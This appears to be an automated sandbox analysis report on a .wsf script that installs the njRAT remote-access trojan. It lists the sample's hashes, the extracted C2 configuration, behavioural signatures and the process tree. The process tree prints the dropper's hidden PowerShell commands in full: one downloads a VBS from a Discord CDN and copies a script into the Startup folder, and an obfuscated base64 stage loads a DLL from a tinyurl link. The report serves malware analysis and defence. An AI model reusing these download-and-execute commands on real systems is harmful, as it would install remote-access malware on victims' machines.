Analysis

max time kernel: 298s
max time network: 301s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 10-10-2022 20:23

Static task: static1
Behavioral task: behavioral1
Sample: 0f35bfed5b1817310378a5df58ca5fcd.wsf
Resource: win7-20220812-en
General

Target: 0f35bfed5b1817310378a5df58ca5fcd.wsf
Size: 84KB
MD5: 0f35bfed5b1817310378a5df58ca5fcd
SHA1: 3062b699b4944f3e70ee80127fe760a68fb3f453
SHA256: bc07c50c0b92825bf9436f7a6816bd86c54f827c00c87304b63ff67ee05e695d
SHA512: c14007ae998ac0bfa7816f314e0c42919c820651e327eb67f6c182e2bd2b0aa2fdef64d6b7f7f51471e6f4903a4e632d354bed5a49ad5f411801857abfc3e9c0
SSDEEP: 48:4sLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLG:tiJZ
Malware Config

Extracted
  Payload URL: https://tinyurl.com/2erph6cs

Extracted
  Family: njrat
  Version: 0.7NC
  Botnet: NYAN CAT
  C2: dnsproxi2022.duckdns.org:1986
  Mutex: 6beb218c1e6044f785a
  Attributes:
    reg_key: 6beb218c1e6044f785a
    splitter: @!#&^%$
Signatures

Blocklisted process makes network request (3 IoCs)
  flow | pid  | Process
  2    | 5052 | powershell.exe
  12   | 4328 | powershell.exe
  14   | 4328 | powershell.exe

Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description       | ioc                                                                                          | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | WScript.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | WScript.exe

Suspicious use of SetThreadContext (1 IoC)
  description                          | pid  | Process        | procid_target
  PID 4328 set thread context of 3692  | 4328 | powershell.exe | 92

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Modifies registry class (1 IoC)
  description | ioc                                                                          | Process
  Key created | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings | explorer.exe

Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid  | Process
  5052 | powershell.exe
  5052 | powershell.exe
  3100 | powershell.exe
  3100 | powershell.exe
  4328 | powershell.exe
  4328 | powershell.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  description                         | pid  | Process
  Token: SeDebugPrivilege             | 5052 | powershell.exe
  Token: SeDebugPrivilege             | 3100 | powershell.exe
  Token: SeDebugPrivilege             | 4328 | powershell.exe
  Token: SeDebugPrivilege             | 3692 | InstallUtil.exe
  Token: 33                           | 3692 | InstallUtil.exe
  Token: SeIncBasePriorityPrivilege   | 3692 | InstallUtil.exe
  (the last two rows, Token: 33 and Token: SeIncBasePriorityPrivilege for PID 3692 InstallUtil.exe, repeat alternately for the remaining entries, 64 IoCs in total)

Suspicious use of WriteProcessMemory (18 IoCs)
  description                       | pid  | Process        | procid_target
  PID 1684 wrote to memory of 5052  | 1684 | WScript.exe    | 82
  PID 1684 wrote to memory of 5052  | 1684 | WScript.exe    | 82
  PID 5052 wrote to memory of 3636  | 5052 | powershell.exe | 84
  PID 5052 wrote to memory of 3636  | 5052 | powershell.exe | 84
  PID 3124 wrote to memory of 1492  | 3124 | explorer.exe   | 86
  PID 3124 wrote to memory of 1492  | 3124 | explorer.exe   | 86
  PID 1492 wrote to memory of 3100  | 1492 | WScript.exe    | 87
  PID 1492 wrote to memory of 3100  | 1492 | WScript.exe    | 87
  PID 3100 wrote to memory of 4328  | 3100 | powershell.exe | 89
  PID 3100 wrote to memory of 4328  | 3100 | powershell.exe | 89
  PID 4328 wrote to memory of 3692  | 4328 | powershell.exe | 92
  (the row "PID 4328 wrote to memory of 3692 | 4328 | powershell.exe | 92" appears 8 times in total)
Processes

Level 1: C:\Windows\System32\WScript.exe
  Command: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0f35bfed5b1817310378a5df58ca5fcd.wsf"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 1684

  Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'https://cdn.discordapp.com/attachments/1024684238085312517/1026668711156928603/Crpted.vbs' -o C:\Windows\Temp\nLeNPdi.vbs;explorer.exe C:\Windows\Temp\nLeNPdi.vbs;Start-Sleep 3;[System.IO.File]::Copy('El presente es el requerimiento enviado a declarar por el proceso 0091-002018-0917875 .wsf','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\дÑÑвПЙ.wsf');Start-Sleep 1;rm *.uue,*.pif
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 5052

    Level 3: C:\Windows\explorer.exe
      Command: "C:\Windows\explorer.exe" C:\Windows\Temp\nLeNPdi.vbs
      PID: 3636

Level 1: C:\Windows\explorer.exe
  Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID: 3124

  Level 2: C:\Windows\System32\WScript.exe
    Command: "C:\Windows\System32\WScript.exe" "C:\Windows\Temp\nLeNPdi.vbs"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID: 1492

    Level 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAC⌚⌚⌚AJwA7AFsAQgB5AHQAZQBbAF0AXQAgACQARABMAEwAIAA9ACAAWwBzAHkAcwB0AG⌚⌚⌚AbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHQAaQBuAHkAdQByAGwALgBjAG8AbQAvADIAZQByAHAAaAA2AGMAcwAnACkAKQA7AFsAcwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAH⌚⌚⌚AcgByAG⌚⌚⌚AbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAG⌚⌚⌚AKAAnAE4AdwBnAG8AeABNAC4ASwBQAEoAYQBOAGoAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFAAVQBsAEcASwBBACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH⌚⌚⌚AbABsACwAIABbAG8AYgBqAG⌚⌚⌚AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AMAAxADMAMABpAHYAbgBlAC8ANAAxADYAMwA2ADMANQA1ADAANAAwADYAOAA2ADYANgAyADAAMQAvADcAMQA1ADIAMQAzAD⌚⌚⌚AOAAwADgAMwAyADQAOAA2ADQAMgAwADEALwBzAHQAbgBlAG0AaABjAGEAdAB0AGEALwBtAG8AYwAuAHAAcABhAGQAcgBvAGMAcwBpAGQALgBuAGQAYwAvAC8AOgBzAHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnAFIAbwBkAGEAJwAgACkAKQA=';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('–——¯¯—¯––¯', 'C:\Windows\Temp\nLeNPdi.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 3100

      Level 4: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = '%%';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://tinyurl.com/2erph6cs'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('txt.0130ivne/4163635504068666201/7152135808324864201/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $RodaCopy , 'Roda' ))"
        - Blocklisted process makes network request
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 4328

        Level 5: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
          Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
          - Suspicious use of AdjustPrivilegeToken
          PID: 3692
Network
MITRE ATT&CK Enterprise v6
Downloads

Filesize: 3KB
MD5: f41839a3fe2888c8b3050197bc9a0a05
SHA1: 0798941aaf7a53a11ea9ed589752890aee069729
SHA256: 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA512: 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Filesize: 64B
MD5: 0ff7e1af4cc86e108eef582452b35523
SHA1: c2ccf2811d56c3a3a58dced2b07f95076c6b5b96
SHA256: 62ed8ef2250f9f744852cb67df0286c80f94e26aed646989b76e5b78f2f1f0d0
SHA512: 374675fd36cd8bc38acaec44d4cc855b85feece548d99616496d498e61e943fd695fec7c57550a58a32455e8b21b41bafa18cd1dadac69676fff1de1a56da937

Filesize: 1KB
MD5: d7b5fc204bea26e27b5dad3fde21bb2f
SHA1: acc420ea5b24aecf437ec99ebe7002a8569833bd
SHA256: ebea730291a8e997962079cad97c2ee9b159f74b96ea22c49548c4b3f0da279d
SHA512: 7c5bb43f40ae7b8c8baa6c52e6f70a17b320c90b9a36d72df979fb75dbd5c4fe1e797d40a54e21aa41e844e690e6b9fb46a09f51dc4fd0d3d9fd8f59693a1fc7

Filesize: 201KB
MD5: 46306c9f94abfaca3a6409d80636075e
SHA1: adf4b0875ff61448d689a786066ac12f97b065dc
SHA256: 4df9ac8599d0ff50d464df2887feea99f6c8c13105cc33c4d5554d41f5c7442b
SHA512: 589ef5c79a272a1575d672bf60547e742f2d55181d8561f39b09517b678e0beb46abb3a1450d41e6224ea0c75bd52ab49a3e630fbb371a6e9c6d23e26b534a76